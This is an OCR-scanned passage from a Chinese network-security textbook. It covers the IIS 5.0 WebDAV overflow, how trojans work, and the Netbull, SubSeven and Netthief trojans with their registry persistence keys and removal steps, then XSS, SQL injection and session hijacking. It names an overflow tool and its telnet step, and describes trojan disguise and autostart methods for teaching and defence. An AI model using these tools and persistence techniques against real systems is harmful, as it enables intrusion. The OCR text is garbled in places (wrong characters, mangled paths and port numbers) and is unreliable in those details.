除 远程 服务 器 上 的 文件 ,但 是 作为 普通 的 HTTP 服务 器 ,这 个 功能 不 是 必需 的 。 

IIS 5. 0 包含 的 WebDA V 组 件 不 充分 检查 传递 给 部 分 系统 组 件 的 数据 ,远程 攻击 者 利 
用 这 个 漏洞 对 WebDAV 进行 缓冲 区 溢出 攻击 ,可 能 以 Web 进程 权限 在 系统 上 执行 任意 指 
令 。 出 现 这 个 漏洞 的 原因 是 IIS 5.0 的 WebDAV 使 用 了 ntdll. dll 中 的 一 些 函 数 , 而 这 些 函 
数 存在 一 个 缓冲 区 溢出 漏洞 。 通 过 对 WebDAYV 的 畸形 请 求 可 以 触发 这 个 溢出 。 成 功利 用 
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这 个 漏洞 可 以 获得 LocalSystem 权限 。 这 意味 着 ,入 侵 者 可 以 获得 主机 的 完全 控制 能 力 。 
所 以 确切 地 说 ,这 个 漏洞 并 不 是 TIS 造成 的 ,而 是 ntdll. dll 里 面 的 一 个 API 函数 造成 
的 。 也 就 是 说 ,很 多 调用 这 个 API 的 应 用 程序 都 存在 这 个 漏洞 。 


1. 受 影响 系统 


Windows IIS 5.0 

* Microsoft Windows 2000 Server SP3 

* Microsoft Windows 2000 Professional SP3 

* Microsoft Windows 2000 Datacenter Server SP3 
* Microsoft Windows 2000 Advanced Server SP3 


2. 漏洞 检测 工具 


Webdavscan. exe 是 WebDAV 漏洞 专用 扫描 器 , 红 客 联盟 出 品 。 它 可 以 对 不 同 IP. 段 进 
行 扫描 ,来 检测 网 段 的 Microsoft IIS 5. 0 服务 器 是 否 提供 了 对 WebDAV 的 支持 ,如 果 结 果 
显示 enable, 则 说 明 此 服务 器 支持 WebDAV 并 可 能 存在 漏洞 。webdavx3. exe 是 isno 的 针 
对 Windows 2000 中 文 版 的 溢出 工具 ,不 用 NC 监听 端口 ,溢出 成 功 后 直接 telnet ip 7788 即 
可 。 


3. 解决 方法 


要 避免 此 漏洞 , 须 安装 安全 补丁 : 

Solution\Q815021_W2K_sp4_x86_CN. EXE 适用 于 中 文 Windows 2000, 
Solution\Q815021_W2K_sp4_x86 EN. EXE 适用 于 英文 Windows 2000, 
设置 注册 表 :, Solution\webdav. reg > Wii TAEI 


3.4.4 木马 攻击 与 防御 


在 介绍 木马 的 原理 之 前 , 先 介绍 一 些 木马 构成 的 基础 知识 ,因为 下 面 有 很 多 地 方 会 提 到 
这 些 内 容 。 

一 个 完整 的 木马 系统 由 硬件 部 分 软件 部 分 和 具体 连接 部 分 组 成 。 

(1) 硬件 部 分 : 建立 木马 连接 所 必需 的 硬件 实体 。 控 制 端 : 对 服务 端 进行 远程 控制 的 
一 方 。 服 务 端 : 被 控制 端 远程 控制 的 一 方 。Internet: 控制 端 对 服务 端 进行 远程 控制 ,数据 
传输 的 网 络 载体 。 

(2) 软件 部 分 : 实现 远程 控制 所 必需 的 软件 程序 。 控 制 端 程序 : 控制 端 用 以 远程 控制 
服务 端的 程序 。 木 马 程序 : 潜入 服务 端 内 部 ,获取 其 操作 权限 的 程序 。 木 马 配置 程序 : 设 
置 木马 程序 的 端口 号 触发 条 件 ,木马 名 称 等 ,使 其 在 服务 端 藏 得 更 隐蔽 的 程序 。 

(3) 具体 连接 部 分 : 通过 Internet 在 服务 端 和 控制 端 之 间 建 立 一 条 木马 信道 所 必需 的 
元 素 。 控 制 端 IPARI IP: 控制 端 ,服务 端的 网 络 地 址 ,也 是 木马 进行 数据 传输 的 目的 
地 。 控 制 端 端口 .服务 端口 : 控制 端 \ 服 务 端的 数据 入 口 ,通过 这 个 人 口 ,数据 可 直达 控制 端 
程序 或 木马 程序 。 
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1. 特洛伊 木马 攻击 原理 


使 用 木马 这 种 黑客 工具 进行 网 络 人 侵 ,从 过 程 上 看 大 致 可 分 为 6 步 。 接 下 来 就 按 这 6 
步 详细 站 述 木马 的 攻击 原理 。 

1) 配置 木马 

一 般 来 说 一 个 设计 成 熟 的 木马 都 有 木马 配置 程序 ,从 具体 的 配置 内 容 看 ,主要 是 为 了 实 
现 以 下 两 方面 功能 。 

O 木马 伪装 : 木马 配置 程序 为 了 在 服务 端 尽 可 能 好 地 隐藏 木马 ,会 采用 多 种 伪装 手 
段 ,如 修改 图 标 、 捆 绑 文件 .定制 端口 . 白 我 销毁 等 。 

© 信息 反馈 : 木马 配置 程序 将 就 信息 反馈 的 方式 或 地 址 进行 设置 ,如 设置 信息 反馈 的 
邮件 地 址 IRC 号 ICQ 号 等 。 

2) 传播 木马 

CD 传播 方式 

木马 的 传播 方式 主要 有 两 种 : 一 种 是 通过 E-mail, 控 制 端 将 木马 程序 以 附件 的 形式 夹 
在 邮件 中 发 送出 去 , 收 信 人 只 要 打开 附件 系统 就 会 感染 木马 ; 另 一 种 是 软件 下 载 ,一 些 非 正 
规 的 网 站 以 提供 软件 下 载 为 名 义 , 将 木马 捆绑 在 软件 安装 程序 上 ,下 载 后 ,只 要 一 运行 这 些 
程序 ,木马 就 会 自动 安装 。 

(2) 伪装 方式 

鉴于 木马 的 危害 性 ,很 多 人 对 木马 知识 还 是 有 一 定 了 解 的 ,这 对 木马 的 传播 起 了 一 定 的 
抑制 作用 ,这 是 木马 设计 者 所 不 愿 见 到 的 。 因 此 他 们 开发 了 多 种 功能 来 伪装 木马 ,以 达到 降 
低 用 户 警 觉 ,欺骗 用 户 的 目的 。 一 般 来 说 有 以 下 几 种 。 

O 修改 图 标 : 也 许 你 会 在 E-mail 的 附件 中 看 到 一 个 很 平常 的 文本 图 标 ,这 有 可 能 是 个 
木马 程序 ,现在 已 经 有 木马 可 以 将 木马 服务 端 程序 的 图 标 改 成 HTML、TXT、ZIP 等 各 种 文 
件 的 图 标 ,这 有 相当 大 的 迷惑 性 ,但 是 目前 提供 这 种 功能 的 木马 还 不 多 见 。 

@ 捆绑 文件 : 这 种 伪装 手段 是 将 木马 捆绑 到 一 个 安装 程序 上 , 当 安 装 程序 运行 时 , 森 
马 在 用 户 毫 无 察觉 的 情况 下 ,偷偷 地 进入 了 系统 。 被 捆绑 的 文件 是 可 执行 文件 , 即 EXE, 
COM 一 类 的 文件 。 

@ 出 错 显示 : 有 一 定 木马 知识 的 人 都 知道 ,如 果 打 开 一 个 文件 ,没有 任何 反应 ,这 很 可 
能 就 是 个 木马 程序 ,木马 的 设计 者 也 意识 到 了 这 个 缺陷 ,所 以 已 经 有 木马 提供 了 一 个 叫做 出 
错 显示 的 功能 。 当 服务 端 用 户 打 开 木 马 程序 时 ,会 弹出 一 个 错误 提示 框 一 一 这 当然 是 假 的 ， 
错误 内 容 可 自由 定义 ,大 多 会 定制 成 一 些 诸如 “文件 已 破坏 ,无 法 打开 !1” 之 类 的 信息 , 当 服 务 
端 用 户 信 以 为 真 时 ,木马 却 悄悄 侵入 了 系统 。 

@ 定制 端口 : 很 多 老式 的 木马 端口 都 是 固定 的 ,这 给 判断 是 否 感染 了 木马 带 来 了 方 
便 , 只 要 查 一 下 特定 的 端口 就 知道 感染 了 什么 木马 ,所 以 现在 很 多 新 式 的 木马 都 加 入 了 定制 
端口 的 功能 ,控制 端 用 户 可 以 在 1024~65 535 之 间 任 选 一 个 端口 作为 木马 端口 。 一 般 不 选 
1024 以 下 的 端口 ,这 样 就 给 判断 所 感染 木马 类 型 带 来 了 麻烦 。 

O 自我 销毁 : 这 项 功能 是 为 了 弥补 木马 的 一 个 缺陷 。 当 服务 端 用 户 打开 含有 木马 的 
文件 后 ,木马 会 将 自己 复制 到 Windows 的 系统 文件 的 C:\WINDOWS 或 C: \WINDOWS\ 
SYSTEM 目录 下 ,一般 来 说 原木 马 文件 和 系统 文件 夹 中 的 木马 文件 大 小 是 一 样 的 ,捆绑 文 
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件 的 木马 除外 。 那 么 中 了 木马 的 朋友 只 要 在 近来 收 到 的 信件 和 下 载 的 软件 中 找到 原木 马 文 
件 , 然 后 根据 原木 马 的 大 小 去 系统 文件 夹 找 相同 大 小 的 文件 ,判断 一 下 哪个 是 木马 就 行 了 。 
而 木马 的 自我 销毁 功能 是 指 安装 完 木马 后 ,原木 马 文件 将 自动 销毁 ,这 样 服务 端 用 户 很 难 找 
到 木马 的 来 源 ,在 没有 查 杀 木马 的 工具 帮助 下 ,很 难 删除 木 马 了 。 

@ 木马 更 名 : 安装 到 系统 文件 夹 中 的 木马 的 文件 名 一 般 是 固定 的 ,那么 只 要 根据 一 些 
查 杀 木马 的 文章 , 按 图 索 台 在 系统 文件 夹 查找 特定 的 文件 ,就 可 以 断定 中 了 什么 木马 。 所 以 
现在 有 很 多 木马 都 允许 控制 端 用 户 自由 定制 安装 后 的 木马 文件 名 ,这 样 很 难 判 断 所 感染 的 
木马 类 型 了 。 

3) 运行 木马 

服务 端 用 户 运 行 木马 或 捆绑 木马 的 程序 后 ,木马 就 会 自动 进行 安装 。 首 先 将 自身 复制 
到 Windows fi] z& t Xc (Ese (C; WINDOWS 3à C; \WINDOWS\SYSTEM 目录 下 )。 然 
后 在 注册 表 、 启 动 组 , 非 启动 组 中 设置 好 木马 的 触发 条 件 , 这 样 木马 的 安装 就 完成 了 。 安 装 
后 就 可 以 启动 木马 了 。 

(1) 由 触发 条 件 激活 木马 。 

和 触发 条 件 是 指 启动 木马 的 条 件 ,大 致 出 现在 下 面 几 个 地 方 。 

(D 注册 表 : 打开 HKEY _ LOCAL _ MACHINE \ Software \ Microsoft V Windows V 
CurrentVersion\ 下 的 五 个 以 RunServices 主键 ,在 其 中 寻找 可 能 是 启动 木马 的 键 值 。 

© 打开 HKEY_CLASSES_ROOT\ 文 件 类 型 \shell\open\command 主键 ,查看 其 键 
值 。 举 个 例子 ,国产 木马 "冰河 ”就 是 修改 HKEY_CLASSES_ROOT\txtfile\ shell\open\ 
command 下 的 键 值 ,将 “C:\ WINDOWS \ NOTEPAD. EXE %1” 改 为 *C:\ WINDOWS\ 
SYSTEM\SYSEXPLR. EXE %1”, 这 时 双击 一 个 TXT 文件 后 ,原本 应 用 Notepad 打开 文 
件 的 ,现在 却 变 成 启动 木马 程序 了 。 还 要 说 明 的 是 不 光 是 TXT 文件 ,通过 修改 HTML、 
EXE, ZIP 等 文件 的 启动 命令 的 键 值 都 可 以 启动 木马 ,不 同 之 处 只 在 于 “文件 类 型 "这 个 主键 
的 差别 ,TXT 是 txtfile,ZIP 是 WINZIP, 大 家 可 以 试 着 去 找 一 下 。 

@ WIN. INI; C:\WINDOWS 目录 下 有 一 个 配置 文件 win. ini, 用 文本 方式 打开 ,在 
Windows 字段 中 有 启动 命令 load 三 和 run 二 ,在 一 般 情况 下 是 空白 的 ,如 果 有 启动 程序 ,可 
能 是 木马 。 

@ SYSTEM. INI. C:\WINDOWS 目录 下 有 个 配置 文件 system. ini, 用 文本 方式 打开 ， 
在 386Enh、mic、drivers32 中 有 命令 行 ,在 其 中 寻找 木马 的 启动 命令 。 

(9 Autoexec. bat 和 Config. sys: Æ C 盘 根 目 录 下 的 这 两 个 文件 也 可 以 启动 森马。 但 
这 种 加 载 方式 一 般 都 需要 控制 端 用 户 与 服务 端 建立 连接 后 ,将 已 添加 木马 启动 命令 的 同名 
文件 上 传 到 服务 端 覆盖 这 两 个 文件 才 行 。 

@ *. INI; 应 用 程序 的 启动 配置 文件 ,控制 端 利 用 这 些 文件 能 启动 程序 的 特点 ,将 制 
作 好 的 带 有 木马 启动 命令 的 同名 文件 上 传 到 服务 端 覆盖 该 同名 文件 ,就 可 以 达到 启动 木马 
的 目的 了 。 

@ 捆绑 文件 : 实现 这 种 触发 条 件 首先 要 控制 端 和 服务 端 通过 木马 建立 连接 ,然后 控制 
端 用 户 用 工具 软件 将 木马 文件 和 某 一 应 用 程序 捆绑 在 一 起 ,然后 上 传 到 服务 端 覆盖 原文 件 ， 
这 样 即使 木马 被 删除 ,只 要 运行 捆绑 了 木马 的 应 用 程序 ,木马 又 会 被 安装 上 去 了 。 

启动 菜单 : 在 “开始 ”程序 ”启动 ”命令 下 也 可 能 有 木马 的 触发 条 件 。 
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(2) 木马 运行 过 程 。 

木马 被 激活 后 ,进入 内 存 , 并 开启 事先 定义 的 木马 端口 ,准备 与 控制 端 进行 连接 ,我 们 就 
可 以 通过 进入 MS-DOS 方式 下 ,用 netstat 命令 的 -a\-n 来 查看 端口 的 状态 来 查看 是 否 有 可 
疑 端 口 开 放 , 来 进一步 判断 是 否 感染 了 木马 。 下 面 是 计算 机 感染 木马 后 ,用 NETSTAT 命 
令 查看 端口 的 两 个 实例 : 服务 端 与 控制 端 建立 连接 时 的 显示 状态 ; 服务 端 与 控制 端 还 未 建 
立 连接 时 的 显示 状态 。 

在 上 网 过 程 中 下 载 软件 ,发 送信 件 . 网 上 聊天 等 必然 打开 一 些 端口 ,下 面 是 一 些 常用 
端口 。 

(D 1~1024 之 间 的 端口 : 这 些 端口 叫 保留 端口 ,是 专 给 一 些 对 外 通信 的 程序 用 的 ,如 
FTP 使 用 21, SMTP 使 用 25,POP3 使 用 110 等 。 只 有 很 少 木马 会 用 保留 端口 作为 木马 
端口 。 

@ 1025 以 上 的 连续 端口 : 在 上 网 浏览 网 站 时 ,浏览 器 会 打开 多 个 连续 的 端口 下 载 文 
字 、 图 片 到 本 地 硬盘 上 ,这 些 端口 都 是 1 025 以 上 的 连续 端口 。 

(3) 4000 端口 : 这 是 OICQ 的 通信 端口 。 

@ 6667 端口 : 这 是 IRC 的 通信 端口 。 

除 上 述 的 端口 基本 可 以 排除 在 外 ,如 发 现 还 有 其 他 端口 打开 ,尤其 是 数值 比较 大 的 端 
EH , 那 就 要 怀疑 是 否 感染 了 木马 。 当 然 ,如 果木 马 有 定制 端口 的 功能 , 那 任 何 端口 都 有 可 能 
是 木马 端口 。 

4) 泄露 信息 

一 般 来 说 ,设计 成 熟 的 木马 都 有 一 个 信息 反馈 机 制 。 所 谓 信息 反馈 机 制 是 指 木马 成 功 
安装 后 会 收集 一 些 服 务 端的 软 硬 件 信息 ,并 通过 E-mail, IRC 或 ICQ 的 方式 告知 控制 端 
用 户 。 

5) 建立 连接 

一 个 木马 连接 的 建立 首先 必须 满足 两 个 条 件 : 一 是 服务 端 已 安装 了 木马 程序 ; 二 是 控 
制 端 ,服务 端 都 要 在 线 。 在 此 基础 上 控制 端 可 以 通过 木马 端口 与 服务 端 建立 连接 。 

6) 远程 控制 

木马 连接 建立 后 ,控制 端 端口 和 木马 端口 之 间 将 会 出 现 一 条 通道 ,控制 端 上 的 控制 端 程 
序 可 借 这 条 信道 与 服务 端 上 的 木马 程序 取得 联系 ,并 通过 木马 程序 对 服务 端 进行 远程 控制 。 

下 面 介 绍 控制 端 具体 能 享有 哪些 控制 权限 ,这 远 比 你 想象 的 要 大 。 

COD 窃取 密码 : 一 切 以 明文 的 形式 、* 形式 或 缓存 在 Cache 中 的 密码 都 能 被 木马 侦 测 
到 ,此 外 很 多 木马 还 提供 有 击 键 记录 功能 , 它 将 会 记录 服务 端 每 次 硕 击 键盘 的 动作 ,所 以 一 
旦 有 木马 入 侵 , 密 码 将 很 容易 被 窃取 。 

(2) 文件 操作 : 控制 端 可 借 由 远程 控制 对 服务 端 上 的 文件 进行 删除 .新 建 、 修 改 .上 传 、 
TA .运行 .更改 属性 等 一 系列 操作 ,基本 涵盖 了 Windows 平台 上 所 有 的 文件 操作 功能 。 

(3) 修改 注册 表 : 控制 端 可 任意 修改 服务 端 注 册 表 ,包括 删除 .新建 或 修改 主键 . 子 键 、 
键 值 。 有 了 这 项 功能 控制 端 就 可 以 禁止 服务 端 软驱 .光驱 的 使 用 , 锁 住 服务 端的 注册 表 ,将 
服务 端木 马 的 触发 条 件 设置 得 更 隐蔽 的 一 系列 高 级 操作 。 

CD. 系统 操作 : 这 项 内 容 包括 重启 或 关闭 服务 端 操作 系统 , 断 开 服 务 端 网 络 连 接 , 控 制 
服务 端的 鼠标 、 键 盘 , 监 视 服 务 端 桌面 操作 ,查看 服务 端 进 程 等 ,控制 端 甚至 可 以 随时 给 服务 
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端 发 送信 息 。 想 象 一 下 , 当 服务 端的 桌面 上 突然 跳出 一 段 话 ,不 吓人 一 跳 才 怪 。 
2. 特洛伊 木马 程序 的 防范 


在 对 付 特洛伊 木马 程序 之 前 ,有 以 下 几 种 办 法 。 

CD 提高 防范 意识 。 不 要 打开 陌生 人 信 中 的 附件 ,熟人 的 也 要 确认 一 下 来 信 的 原 地 址 
是 否 合法 。 

(2) 多 读 readme. txt。 许 多 人 出 于 研究 目的 下 载 了 一 些 特洛伊 木马 程序 的 软件 包 , 在 
没有 和 弄 清 软 件 包 中 几 个 程序 的 具体 功能 前 ,就 匆匆 地 执行 其 中 的 程序 ,这 样 往往 就 错误 地 执 
行 了 服务 器 端 程序 而 使 用 户 的 计算 机 成 了 特洛伊 木马 的 牺牲 品 。 软 件 包 中 经 常 附带 的 
readme. txt 文件 会 有 程序 的 详细 功能 介绍 和 使 用 说 明 , 尽 管 它 一 般 是 英文 的 ,但 还 是 有 必 
要 先 阅读 一 下 ,如 果实 在 读 不 懂 , 最 好 不 要 执行 任何 程序 ,丢弃 软件 包 当 然 是 最 保险 的 了 。 

(3) 使 用 杀毒 软件 。 现 在 国内 的 杀毒 软件 都 推出 了 清除 某 些 特洛伊 木马 的 功能 , 如 
KV300 ,KILL98 ,瑞星 等 ,可 以 不 定期 地 在 脱 机 的 情况 下 进行 检查 和 清除 。 

(4) 立即 挂 断 。 尽 管 造成 上 网 速度 突然 变 慢 的 原因 有 很 多 ,但 有 理由 怀疑 这 是 由 特 洛 
伊 木 马 造 成 的 , 当 和 人 侵 者 使 用 特洛伊 的 客户 端 程序 访问 你 的 机 器 时 ,会 与 你 的 正常 访问 抢占 
宽带 ,特别 是 当 入 侵 者 从 远 端 下 载 用 户 硬盘 上 的 文件 时 ,正常 访问 会 变 得 奇 慢 无 比 。 

(5) 监测 系统 文件 和 注册 表 的 变化 。 

六 ”应 用 案例 
特洛伊 木马 攻击 的 常用 工具 及 方法 如 下 。 


1. 网 络 公 牛 


网 络 公牛 又 名 Netbull, 是 国产 木马 ,默认 连接 端口 234444, 最 新 版 本 V1. 1。 运 行 服务 
端 程序 newserver. exe 后 ,会 自动 脱 壳 成 checkdll. exe, 位 于 C:\WINDOWS\SYSTEM F, 
下 次 开机 checkdll. exe 将 自动 运行 ,因此 很 隐蔽 ,危害 很 大 。 同 时 ,服务 端 运 行 后 会 自动 捆 
绑 Windows 2000 文 件 。 

Windows 2000 下 的 文件 :在 2000 下 会 出 现 文件 改动 报警 ,但 也 不 能 阻止 以 下 文件 的 
捆绑 )notepad. exe; regedit. exe,reged32. exe; drwtsn32. exe; winmine. exe, 

服务 端 运行 后 还 会 捆绑 在 开机 时 自动 运行 的 第 三 方 软件 (如 realplay. exe, QQ, ICQ 
等 ) 上 。 在 注册 表 中 网 络 公牛 也 悄悄 地 扎 下 了 根 ,如 下 : 

[HKEY_CURRENT_USER\ Sof tware\Microsoft\Windows\CurrentVersion\Run] 

"CheckD11. exe" = "C: WWINDOWSVSYSTEMVCheckDl1. exe" 

[HKEY_LOCAL MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices] 

"CheckD11. exe" = "C:\WINDOWS\SYSTEM\CheckD]11. exe" 


[HKEY_USERS\ . DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run] 
"CheckD11. exe" = "C:\WINDOWS\SYSTEM\CheckD]11. exe" 


网 络 公牛 采用 文件 捆绑 功能 ,和 上 面 所 列 出 的 文件 捆绑 在 一 块 ,要 清除 非常 困难 。 这 样 
做 也 有 个 缺点 : 容易 暴露 自己 。 稍 微 有 经 验 的 用 户 ,就 会 发 现 文件 长 度 发 生 了 变化 ,从 而 怀 
疑 自己 中 了 木马 。 

可 以 采取 以 下 几 种 方法 清除 网 络 公牛 。 


T 


MV 


78 


A 


网 络 安全 技术 


。 删除 网 络 公 和牛 的 自 启动 程序 C:\WINDOWS\SYSTEM\CheckDIl. exe. 

。 把 网 络 公牛 在 注册 表 中 所 建立 的 键 值 全 部 删除 (上 面 所 列 出 的 那些 键 值 全 部 删除 ) 。 
。 检查 上 面 列 出 的 文件 ,如 果 发 现 文件 长 度 发 生变 化 (大 约 增加 了 40KB, 可 以 通过 与 
其 他 机 子 上 的 正常 文件 比较 而 知 ) ,就 删除 它们 ! 然后 选择 “开始 -附件 ”一 “系统 
工具 -~ 系统 信息 ”工具 -> 系统 文件 检查 器 ?命令 ,在 弹出 的 对 话 框 中 选中 “从 
安装 软盘 提取 一 个 文件 ”, 在 文本 框 中 输入 要 提取 的 文件 (前 面 你 删除 的 文件 ) , 单 击 
“确定 ”按钮 ,然后 按 屏幕 提示 将 这 些 文件 恢复 即 可 。 如 果 是 开机 时 自动 运行 的 第 三 
方 软件 如 realplay. exe QQ 等 被 捆绑 上 了 ,就 把 这 些 文件 删除 ,重新 安装 。 


2. SubSeven 


SubSeven 的 功能 比 起 大 名 易 易 的 BOZK 可 以 说 有 过 之 而 无 不 及 。 最 新 版 为 2. 2( 默 认 
连接 端口 27374) ,服务 端 只 有 54. 5 ,很 容易 被 捆绑 到 其 他 软件 而 不 被 发 现 。 最 新 版 的 金山 
毒霸 等 杀毒 软件 查 不 到 它 。 服 务 器 端 程序 为 server. exe, 客 户 端 程序 为 subseven. exe, 
SubSeven 服务 端 被 执行 后 ,变化 多 端 ,每 次 启动 的 进程 名 都 会 发 生变 化 ,因此 查 之 很 难 。 清 
除 方法 如 下 。 
。 打 开 注册 表 Regedit, 单 击 至 HKEY_LOCAL_MACHINE\ SOFTW ARE\ Microsoft\ 
WindowsVCurrentVersionVRun 和 RunService 下 ,如 果 有 加 载 文 件 , 就 删除 右边 的 
项 目 : WM=" c:\windows VsystemV s * ", iE; 加 载 器 和 文件 名 是 随意 改 
变 的 。 

。 打 开 win. ini 文件 ,检查 “run=” 后 有 没有 加 上 某 个 可 执行 文件 名 ,如 有 则 删除 之 。 
打开 system. ini 文件 ,检查 “shell 二 explorer. exe” 后 有 没有 跟 某 个 文件 ,如 有 将 它 
删除 。 

。 重新 启动 Windows, 删 除 相对 应 的 木马 程序 ,一 般 在 c:\windows\system F. 


3. 网 络 神偷 


网 络 神偷 又 名 Netthief, 是 第 一 个 反弹 端口 型 木马 。 与 一 般 的 木马 相反 ,反弹 端口 型 木 
马 的 服务 端 (被 控制 端 ) 使 用 主动 端口 ,客户 端 (控制 端 ) 使 用 被 动 端口 。 为 了 隐蔽 起 见 ,客户 
端的 监听 端口 一 般 开 在 80, 这 样 ,即使 用 户 使 用 端口 扫描 软件 检查 自己 的 端口 ,发 现 的 也 是 
类 似 “TCP 服务 端的 PP 地 址 :1026 客户 端的 IP 地 址 :80 ESTABLISHED” HTE IE, Ri i 
忽 一 点 你 就 会 以 为 自己 在 浏览 网 页 。 

清除 网 络 神偷 的 方法 如 下 。 

。 网络 神偷 会 在 注册 表 HKEY LOCAL MACHINE SOFTWARE Microsoft V 
Windows\CurrentVersion\Run 下 建立 键 值 *internet”, 其 值 为 "internet. exe/s" ,将 
键 值 删 除 。 

。 删除 其 自 启动 程序 C:\WINDOWS\SYSTEM\INTERNET. EXE, 


3.4.5 Web 攻击 与 防御 


Internet 很 多 站 点 都 存在 易 受 攻击 的 漏洞 ,仅仅 通过 IPSec 阻止 对 端口 的 访问 、 给 系统 
打上 最 新 的 补丁 并 不 能 完全 阻挡 黑客 的 攻击 。 除 了 强化 网 络 系统 本 身 的 安全 ,还 要 依赖 
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Web 应 用 程序 开发 者 来 加 强 Web 安全 。 以 下 列举 几 种 最 常见 的 Web 攻击 的 手段 和 防范 
方法 。 


1. 跨 站 脚本 攻击 


所 谓 跨 站 脚本 (cross site scripting) 攻 击 ,是 指 恶意 攻击 者 往 Web 页 面 中 插入 恶意 的 
html 代码 , 当 用 户 浏 览 该 页 时 ,嵌入 Web 里 面 的 html 代码 会 被 执行 ,从 而 达到 恶意 用 户 的 
特殊 目的 。 

通常 跨 站 脚本 被 称 为 “XSS”, 这 是 为 了 与 样式 表 “CSS” 进 行 区 分 所 形成 的 习惯 ,所 以 当 
你 听 某 人 提 到 CSS 或 者 KSS 安全 漏洞 时 ,通常 指 的 是 跨 站 脚本 攻击 。XSS 属于 被 动 式 的 
攻击 ,因为 其 被 动 且 不 好 利用 ,所 以 许多 人 常 忽略 其 危害 性 。 防 范 XSS 攻击 的 方法 如 下 。 

。 在 Web 浏 览 器 上 禁用 JavaScript 和 ActiveX 脚本 。 

。 要 仔细 审核 代码 ,对 提交 输入 数据 进行 有 效 检 查 , 如 “二” 和" 二”, 可 以 把 “<”,“” 

转换 为 二 ,>。 


2. SQL 注入 攻击 


SQL 注入 攻击 是 黑客 对 数据 库 进行 攻击 的 常用 手段 之 一 。SQL 注入 是 从 正常 的 
WWW 端口 访问 ,而 且 表面 看 起 来 跟 一 般 的 Web 页 面 访问 没什么 区 别 , 所 以 目前 市 面 的 防 
火 墙 都 不 会 对 SQL 注入 发 出 警报 ,如 果 管 理 员 没 查看 TIS 日 志 的 习惯 ,可 能 被 入 侵 很 长 时 
间 都 不 会 发 觉 。 但 是 ,SQL 注入 的 手法 相当 灵活 ,在 注入 的 时 候 会 碰 到 很 多 意外 的 情况 , 需 
要 构造 巧妙 的 SQL 语句 ,从 而 成 功 获取 想 要 的 数据 。 

结构 化 查询 语言 (SQL) 是 一 种 用 来 和 数据 库 交互 的 文本 语言 ,SQL Injection 就 是 利用 
某 些 数据 库 的 外 部 接口 把 用 户 数据 插入 到 实际 的 数据 库 操作 语言 当中 ,从 而 达到 入 侵 数据 
库 乃 至 操作 系统 的 目的 。 它 的 产生 主要 是 由 于 程序 对 用 户 输入 的 数据 没有 进行 细致 的 过 
滤 , 导 致 非法 数据 的 导入 查 询 。 

SQL 注入 攻击 主要 是 通过 构建 特殊 的 输入 ,这 些 输 入 往往 是 SQL 语法 中 的 一 些 组 合 ,这 
些 输入 将 作为 参数 传人 Web 应 用 程序 ,通过 执行 SQL 语句 而 执行 入侵 者 想 要 的 操作 。 或 者 
确切 地 说 ,SQL 注入 式 攻 击 就 是 攻击 者 把 SQL 命令 插入 到 Web 表单 的 输入 域 或 页 面 请 求 的 
查询 字符 串 , 欺 骗 服 务 器 执行 恶意 的 SQL 命令 。 在 某 些 表单 中 ,用 户 输入 的 内 容 直 接 用 来 构 
造 动态 SQL 命令 ,或 作为 存储 过 程 的 输入 参数 ,这 类 表单 特别 容易 受到 SQL 注入 式 攻击 。 

防范 SQL 注入 攻击 的 有 效 方法 : 在 服务 端正 式 处 理 之 前 对 提交 数据 的 合法 性 进行 检 
查 ; 封装 客户 端 提交 的 信息 ; 葵 换 或 删除 敏感 字符 /字符 串 ; 屏蔽 出 错 信息 ; 不 要 用 字符 串 
连接 建立 SQL 查询 ,而 使 用 SQL 变量 ,因为 变量 不 是 可 以 执行 的 脚本 ; 最 小 化 权限 设置 ， 
给 静态 网 页 目录 和 动态 网 页 目录 分 别 设置 不 同 权 限 ,尽量 不 给 写 目 录 权限 ; 去 掉 Web 服务 
器 上 默认 的 一 些 危险 命令 ,如 ftp. cmd, wscript 等 ,需要 时 再 复制 到 相应 目录 ; 数据 敏感 信 
息 非常 规 加 密 , 通 过 在 程序 中 对 口令 等 敏感 信息 加 密 都 是 采用 md5 函数 进行 加 密 , 即 密 
X — md5 CH] 3O ; 推荐 在 原来 加 密 的 基础 上 增加 一 些 非常 规 的 方式 , 即 在 md5 加 密 的 基础 
上 附带 一 些 值 , 如 密 文王 md5(md5( 明 文 ) 十 123456) 。 


3. 会 话 劫持 攻击 


Web 应 用 程序 都 是 通过 Cookie 或 者 Session 来 认证 用 户 。 通 过 将 加 密 的 用 户 认证 信 
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息 存 储 到 Cookie 中 ,或 者 通过 赋予 客户 端 一 个 Token, 通 常 也 就 是 所 说 的 SessionId 来 在 服 
务 器 端 直接 完成 认证 和 取得 用 户 的 身份 信息 ,不管 哪 种 方式 ,实际 上 在 HTTP 中 都 是 通过 
Cookie 来 实现 的 ,不 同 的 是 Cookie 可 以 比较 长 期 地 存储 在 客户 端 , 而 Session 往往 在 会 话 
结束 之 后 服务 器 监视 会 话 不 处 于 活动 状态 而 予以 销毁 。 

对 于 Web 应 用 程序 来 讲 , 为 了 安全 ,服务 器 应 该 将 Cookie 和 客户 端 绑 定 ,譬如 将 客户 
端的 加 密 IP 也 存储 到 Cookie 中 ,如 果 发 现 IP 发 生变 化 就 可 以 认为 是 Cookie 发 生 了 泄露 ， 
应 该 取消 这 个 Cookie, 但 是 这 样 一 来 ,用 户 体验 就 非常 不 好 ,所 以 一 般 的 应 用 程序 都 没有 对 
Cookie 采 取 太 多 的 策略 ,这 就 为 客户 端 身份 窃取 提供 了 可 乘 之 机 。 

对 于 Session 认证 ,在 退出 或 者 关闭 浏览 器 而 与 服务 器 的 沟通 结束 之 后 ,Session 在 一 
定时 间 内 也 被 销毁 。 但 是 如 果 程 序 设计 存在 问题 ,可 能 导致 利用 Session 的 机 制 在 服务 器 
上 永久 地 产生 一 个 后 门 (在 某 些 设 计 不 严 的 程序 中 ,可 能 修改 密码 也 不 能 消除 这 种 后 门 ) ,把 
它 称 为 一 种 真正 意义 上 的 会 话 (session) 劫 持 攻击 。 

利用 应 用 程序 设计 缺陷 进行 Session 劫持 的 攻击 原理 : 有 效 的 Session ID 值 可 能 失窃 ， 
合法 用 户 再 次 登录 之 后 ,他 获得 新 的 Session ID, 如 果 攻 击 者 用 窃取 的 Session ID 连接 服务 
器 ,这 样 服务 器 上 就 存在 两 个 有 效 的 Session ID 了 。 通 过 研究 应 用 程序 的 Session 超时 机 
制 和 心跳 包机 制 , 就 可 以 长 久 地 使 这 个 Session 有 效 。 即 使 用 户 退 出 应 用 程序 ,销毁 了 他 的 
Session ID, 但 是 仍然 有 一 个 Session ID 被 攻击 者 掌握 。 

